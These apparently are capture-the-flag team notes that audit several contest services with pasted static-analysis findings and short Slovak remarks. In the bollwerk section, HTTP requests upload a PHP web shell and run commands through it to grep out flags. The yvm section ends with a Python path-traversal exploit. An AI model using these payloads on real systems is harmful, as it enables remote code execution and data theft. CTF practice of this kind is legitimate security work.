# asocialnetwork JS asocialnetwork/docker-compose.yml yaml.docker-compose.security.no-new-privileges.no-new-privileges Service 'asocialnetwork-service-mongo' allows for privilege escalation via setuid or setgid binaries. Add 'no-new-privileges:true' in 'security_opt' to prevent this. Details: https://sg.run/0n8q 15┆ asocialnetwork-service-mongo: ⋮┆---------------------------------------- yaml.docker-compose.security.writable-filesystem-service.writable-filesystem-service Service 'asocialnetwork-service-mongo' is running with a writable root filesystem. This may allow malicious applications to download and run additional payloads, or modify container files. If an application inside a container has to save something temporarily consider using a tmpfs. Add 'read_only: true' to this service to prevent this. Details: https://sg.run/e4JE 15┆ asocialnetwork-service-mongo: asocialnetwork/src/server.js javascript.express.security.audit.express-check-csurf-middleware-usage.express-check-csurf- middleware-usage A CSRF middleware was not detected in your express application. Ensure you are either using one such as `csurf` or `csrf` (see rule references) and/or you are properly doing CSRF validation in your routes with a token or cookies. Details: https://sg.run/BxzR 2┆ const app = express() asocialnetwork/src/views/messages.ejs javascript.express.security.audit.xss.ejs.explicit-unescape.template-explicit-unescape Detected an explicit unescape in an EJS template, using '<%- ... %>' If external data can reach these locations, your application is exposed to a cross-site scripting (XSS) vulnerability. Use '<%= ... %>' to escape this data. If you need escaping, ensure no external data can reach this location. Details: https://sg.run/dKXQ ▶▶┆ Autofix ▶ s/<%-(.*?)%>/<%=\1%>/g 53┆ <%= unreadMessage.sender.userName%> sent you a message: <%- unreadMessage.text%> ten posledny vyzera ako ssti # bollwerk PHP ``` bollwerk/app/Http/Response.php php.lang.security.non-literal-header.non-literal-header Using user input when setting headers with `header()` is potentially dangerous. This could allow an attacker to inject a new line and add a new header into the response. This is called HTTP response splitting. To fix, do not allow whitespace inside `header()`: '[^\s]+'. Details: https://sg.run/9rL8 31┆ header('Content-Disposition: attachment; filename="' . $filename ?? 'file' . '"'); ⋮┆---------------------------------------- 35┆ header('Content-Length: ' . filesize($path)); ``` - recipe: ``` POST /recipes HTTP/1.1 Host: 10.1.36.1:6009 User-Agent: python-requests/2.25.1 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Cookie: PHPSESSID=c82a3bb308539e78762529e18fc1bb4b Content-Length: 79 Content-Type: application/x-www-form-urlencoded title=4N07JH8Q6SPC&description=<?=exec($_GET['c']);?> ``` - musi sa uviest `viewPath` cookie ``` GET //?c=grep -ERho 'ENO[A-Za-z0-9+\/=]{48}' /var/www/html/files | tr ' ' ',' HTTP/1.1 Host: 10.1.36.1:6009 User-Agent: python-requests/2.25.1 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Cookie: PHPSESSID=c82a3bb308539e78762529e18fc1bb4b; viewPath=files/a79ba07dcf26d1815321c6d22176e0e2/4N07JH8Q6SPC.md ``` # granulizer C src/file_handler.c c.lang.security.insecure-use-memset.insecure-use-memset When handling sensitive information in a buffer, it's important to ensure that the data is securely erased before the buffer is deleted or reused. While `memset()` is commonly used for this purpose, it can leave sensitive information behind due to compiler optimizations or other factors. To avoid this potential vulnerability, it's recommended to use the `memset_s()` function instead. `memset_s()` is a standardized function that securely overwrites the memory with a specified value, making it more difficult for an attacker to recover any sensitive data that was stored in the buffer. By using `memset_s()` instead of `memset()`, you can help to ensure that your application is more secure and less vulnerable to exploits that rely on residual data in memory. Details: https://sg.run/l9GE ▶▶┆ Autofix ▶ memset_s(file_name_complete, 0, 128) 408┆ memset(file_name_complete, 0, 128); src/main.c c.lang.security.function-use-after-free.function-use-after-free Variable 'base64encoded' was passed to a function after being freed. This can lead to undefined behavior. Details: https://sg.run/eWyZ 337┆ log_warn("Error parsing the b64: %s", base64encoded); ⋮┆---------------------------------------- ^fixnuté c.lang.security.function-use-after-free.function-use-after-free Variable 'path_cpy' was passed to a function after being freed. This can lead to undefined behavior. Details: https://sg.run/eWyZ 444┆ strcpy(path_cpy, "default_data/bach.wav"); ⋮┆---------------------------------------- c.lang.security.insecure-use-memset.insecure-use-memset When handling sensitive information in a buffer, it's important to ensure that the data is securely erased before the buffer is deleted or reused. While `memset()` is commonly used for this purpose, it can leave sensitive information behind due to compiler optimizations or other factors. To avoid this potential vulnerability, it's recommended to use the `memset_s()` function instead. `memset_s()` is a standardized function that securely overwrites the memory with a specified value, making it more difficult for an attacker to recover any sensitive data that was stored in the buffer. By using `memset_s()` instead of `memset()`, you can help to ensure that your application is more secure and less vulnerable to exploits that rely on residual data in memory. Details: https://sg.run/l9GE ▶▶┆ Autofix ▶ memset_s(string, 0, 1024) 276┆ memset(string, 0, 1024); src/sharing.c c.lang.security.insecure-use-memset.insecure-use-memset When handling sensitive information in a buffer, it's important to ensure that the data is securely erased before the buffer is deleted or reused. While `memset()` is commonly used for this purpose, it can leave sensitive information behind due to compiler optimizations or other factors. To avoid this potential vulnerability, it's recommended to use the `memset_s()` function instead. `memset_s()` is a standardized function that securely overwrites the memory with a specified value, making it more difficult for an attacker to recover any sensitive data that was stored in the buffer. By using `memset_s()` instead of `memset()`, you can help to ensure that your application is more secure and less vulnerable to exploits that rely on residual data in memory. Details: https://sg.run/l9GE ▶▶┆ Autofix ▶ memset_s(file_path, 0, 128) 119┆ memset(file_path, 0, 128); # oldschool PHP ``` ✗ [Low] Use of Password Hash With Insufficient Computational Effort Path: www/index.php, line 420 Info: MD5 hash (used in md5) is insecure. Consider changing it to a secure hashing algorithm. ✗ [Low] XML External Entity (XXE) Injection Path: www/index.php, line 395 Info: Unsanitized input from a database flows to loadXML. This may result in an XXE vulnerability. You may be vulnerable if using an old version of PHP (<8.0) ``` ```bash PHP 7.4.3-4ubuntu2.19 (cli) (built: Jun 27 2023 15:49:59) ( NTS ) ``` # phreaking Go # steinsgate JS v app.js vyzera ako staticky definovane elypticke krivky ``` src/backend/Dockerfile dockerfile.security.missing-user-entrypoint.missing-user-entrypoint By not specifying a USER, a program in the container may run as 'root'. This is a security hazard. If an attacker can control a process running as root, they may have control over the container. Ensure that the last USER in a Dockerfile is a USER other than 'root'. Details: https://sg.run/k281 ▶▶┆ Autofix ▶ USER non-root ENTRYPOINT crond && TOKEN_KEY=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1) node app.js 17┆ ENTRYPOINT crond && TOKEN_KEY=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1) node app.js src/backend/app.js javascript.express.security.audit.express-check-csurf-middleware-usage.express-check-csurf- middleware-usage A CSRF middleware was not detected in your express application. Ensure you are either using one such as `csurf` or `csrf` (see rule references) and/or you are properly doing CSRF validation in your routes with a token or cookies. Details: https://sg.run/BxzR 3┆ const app = express(); src/interface/app.py python.flask.security.audit.app-run-param-config.avoid_app_run_with_bad_host Running flask app with host 0.0.0.0 could expose the server publicly. Details: https://sg.run/eLby 41┆ app.run(host="0.0.0.0", port=4420) ⋮┆---------------------------------------- python.flask.security.injection.subprocess-injection.subprocess-injection Detected user input entering a `subprocess` call unsafely. This could result in a command injection vulnerability. An attacker could use this vulnerability to execute arbitrary commands on the host, which allows them to download malware, scan sensitive data, or run any command they wish on the server. Do not let users choose the command to run. In general, prefer to use Python API versions of system commands. If you must use subprocess, use a dictionary to allowlist a set of commands. Details: https://sg.run/5gW3 31┆ resp = subprocess.check_output(args) ⋮┆---------------------------------------- python.lang.security.dangerous-subprocess-use.dangerous-subprocess-use Detected subprocess function 'check_output' with user controlled data. A malicious actor could leverage this to perform command injection. You may consider using 'shlex.escape()'. Details: https://sg.run/NWxp 31┆ resp = subprocess.check_output(args) src/interface/client.py python.lang.security.deserialization.pickle.avoid-pickle Avoid using `pickle`, which is known to lead to code execution vulnerabilities. When unpickling, the serialized data could be manipulated to run arbitrary code. Instead, consider serializing the relevant data as JSON or a similar text-based serialization format. Details: https://sg.run/OPwB 244┆ pickle.dump(ticket, fp) ⋮┆---------------------------------------- 436┆ configuration.session_ticket = pickle.load(fp) src/interface/templates/index.html html.security.audit.missing-integrity.missing-integrity This tag is missing an 'integrity' subresource integrity attribute. The 'integrity' attribute allows for the browser to verify that externally hosted files (for example from a CDN) are delivered without unexpected manipulation. Without this attribute, if an attacker can modify the externally hosted resource, this could lead to XSS and other types of attacks. To prevent this, include the base64-encoded cryptographic hash of the resource (file) you’re telling the browser to fetch in the 'integrity' attribute for all externally hosted files. Details: https://sg.run/krXA 3┆ <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/11.7.0/styles/default.min.css"> ⋮┆---------------------------------------- 4┆ <link rel="stylesheet" href="https://unpkg.com/98.css"> ⋮┆---------------------------------------- 32┆ <script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/11.7.0/highlight.min.js"></script> ``` # yvm Ocaml docker-compose.yml yaml.docker-compose.security.no-new-privileges.no-new-privileges Service 'nginx' allows for privilege escalation via setuid or setgid binaries. Add 'no-new- privileges:true' in 'security_opt' to prevent this. Details: https://sg.run/0n8q 3┆ nginx: ⋮┆---------------------------------------- yaml.docker-compose.security.writable-filesystem-service.writable-filesystem-service Service 'nginx' is running with a writable root filesystem. This may allow malicious applications to download and run additional payloads, or modify container files. If an application inside a container has to save something temporarily consider using a tmpfs. Add 'read_only: true' to this service to prevent this. Details: https://sg.run/e4JE 3┆ nginx: web/util.php php.lang.security.exec-use.exec-use Executing non-constant commands. This can lead to command injection. Details: https://sg.run/5Q1j 10┆ $process = proc_open($args, $fd_spec, $pipes, getcwd() . "/$dir", 11┆ array("OCAMLRUNPARAM" => "b")); toto by nemal byť problém asi, pred tým je array_unshift($args, "../yvm", $class); exploit: http://localhost:6969/flow/64bbd529e3eb8acab2fbb2c9 ``` import os import requests import sys host = sys.argv[1] headers = {'User-Agent': 'python-requests/2.28.1', 'Cookie': 'token=../notes/1302syywavaykdzaxyae'} data = {} requests.get(f"http://{host}:3165" + '/notes.php?show=flag', data=data, headers=headers) ``` checker bot: User-Agent: python-httpx/0.23.3 C